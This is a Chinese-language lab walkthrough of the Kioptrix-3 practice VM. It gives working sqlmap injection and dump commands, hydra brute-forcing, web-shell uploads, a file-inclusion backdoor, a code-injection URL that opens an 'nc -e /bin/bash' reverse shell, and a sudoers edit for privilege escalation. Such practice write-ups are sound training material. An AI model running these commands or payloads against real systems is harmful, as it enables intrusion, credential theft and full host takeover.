Kioptrix-3 ( 补漏 )

淫漫则不能励精,险躁则不能治性。

0x01 getshell

上次目录扫描得到数据库登录界面和用户登录界面,普通的字典爆破思路不可取,所以接下来是通过挖掘 web 漏洞得到用户登录的账密。

① SQL注入漏洞

  1. 在 /gallery 目录找到一个疑似 SQL 注入漏洞
    Kioptrix-3 ( 补漏 )_第1张图片
    Kioptrix-3 ( 补漏 )_第2张图片
  2. 使用 sqlmap 对目标 URL 进行漏扫
    PS: 使用 sqlmap 之前现在 Kali 的 /etc/hosts 文件中添加进靶机 IP 和域名的映射,不然可能扫不出来。
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" 

Kioptrix-3 ( 补漏 )_第3张图片

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --current-db

Kioptrix-3 ( 补漏 )_第4张图片

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery --tables

Kioptrix-3 ( 补漏 )_第5张图片

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T gallarific_users --columns

Kioptrix-3 ( 补漏 )_第6张图片

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T gallarific_users --dump

Kioptrix-3 ( 补漏 )_第7张图片

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T dev_accounts --columns

Kioptrix-3 ( 补漏 )_第8张图片

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump

② hydra 爆破

  1. 通过上面对 dev_accountsgallarific_users 表的读取发现了三组账密,分别保存在 Kali 桌面 user.txt ,passwd.txt
账号 密码
admin n0t7t1k4
dreg Mast3r
loneferret starwars
  1. 使用 hydra 和上面的账密对用户登录界面、ssh 登录和数据库登录界面进行爆破。也爆破一下
    在用户登录界面得到一组用户账密可用:admin/Mast3r
hydra -L user.txt -P passwd.txt 10.10.16.153 http-post-form "/index.php?system=Admin&page=loginSubmit:username=^USER^&password=^PASS^:S=logout" -F

在这里插入图片描述

  1. ssh 登录得到两组用户可用,分别是:dreg/Mast3rloneferret/starwars
hydra -L user.txt -P passwd.txt ssh://10.10.16.153

Kioptrix-3 ( 补漏 )_第9张图片

  1. 在数据库登录界面没有可用用户。
hydra -L user.txt -P passwd.txt 10.10.16.153 http-post-form "/phpmyadmin:username=^USER^&password=^PASS^:S=logout" -F

在这里插入图片描述

  1. 使用 dreg/loneferret 两个用户进行 ssh 登录,得到普通用户的 shell 之后可以使用上一篇记录的内核漏洞提权。这里不做重复记录了。由于前面有出现 phpmyadmin 数据库操作系统,下面可以照照数据库登录账密。

③ phpmyadmin

  1. 在 home 目录下查找包含 localhost 的文件,找到数据库的设置文件
grep -r "localhost" /home 

Kioptrix-3 ( 补漏 )_第10张图片

  1. 使用得到的数据库连接账密:root/fuckeyou 登录数据库操作系统
    Kioptrix-3 ( 补漏 )_第11张图片
  2. 得到数据库也不过是重走 sql 注入脱库之路而已,如果靶机有开放数据库端口(如:3306),那可以使用 sqlmap 通过连接 mysql 获取 shell,不过靶机只开放 22/80 端口,没有数据库服务端口,但还是要记录下来。
sqlmap -d "mysql://root:[email protected]:3306/mysql" --os-shell
参数格式:"mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" or "access://DATABASE_FILEPATH"
  1. 由于 dreg 的 shell 是一个受限的 shell(rbash),普通的命令都使用不了,所以下面使用 loneferret 的 shell。
    Kioptrix-3 ( 补漏 )_第12张图片

④ 三种植入后门的方法

由于网站的根目录没有写入的权限(只有 root 有 w 权限),所以一下三种在网站根目录植入 shell.php 来反弹 shell 的做法发挥不了,不过还是记录下。
Kioptrix-3 ( 补漏 )_第13张图片

01 利用 SQL 注入漏洞植入后门

sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --is-dba (当前用户要是管理员才能植入)
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --os-shell

02 利用 SQL 注入写入反弹 shell 文件

weevely generate 123456 /tmp/shell.php #weevely 生成后门
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --file-write=/tmp/shell.php --file-dest=/home/www/kioptrix3.com/shell.php

03 phpmyadmin 植入后门

也可以在 phpmyadmin 界面反弹 getshell,前提条件下是知道网站的真实路径和有写入权限

select '' INTO OUTFILE '/home/www/kioptrix3.com/shell.php'

⑤ 文件包含漏洞

虽然在靶机的网站根目录下普通用户没有写入权限,可以利用上面的方法在 /tmp 目录下写入后门,通过首页的文件包含漏洞 getshell
PS: 使用 weevely 连接的时候,后门地址要使用 00截断 ,不然不能反弹 shell

weevely http://10.10.16.153/index.php?system=../../../../../tmp/shell.php%001 123456

在这里插入图片描述
Kioptrix-3 ( 补漏 )_第14张图片

⑥ 代码注入漏洞

http://10.10.16.153/index.php?page=${@print(system("nc -e /bin/bash 10.10.16.128 4444"))}\
nc -lvnp 4444

Kioptrix-3 ( 补漏 )_第15张图片

0x02 提权

  1. 在 loneferret 账户下发现 CompanyPolicy.README 文件,查看发现可以使用 ht
    Kioptrix-3 ( 补漏 )_第16张图片
  2. 直接使用 ht 会出现错误,根据错误添加相应的参数 export TERM=xterm
    在这里插入图片描述
    Kioptrix-3 ( 补漏 )_第17张图片
  3. 按 f3 键,输入 /etc/sudoers ,修改 sudo 配置文件
    Kioptrix-3 ( 补漏 )_第18张图片
  4. 在 loneferret 用户那一栏最后添加 /bin/bash,CTRL+w 保存,CTRL+z 退出
    PS: 也可以将 loneferret 用户那一栏变成如下:
loneferret ALL=(ALL) ALL #NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

Kioptrix-3 ( 补漏 )_第19张图片

  1. 直接执行 /bin/bash 回车就可以提权,但我这里不行,提示 segmentation fault ,无法保存修改,所以没有效果,不过别人的是可以的。

                                                                                                                                           猪头
                                                                                                                                        2020.3.18
    

你可能感兴趣的:(OSCP)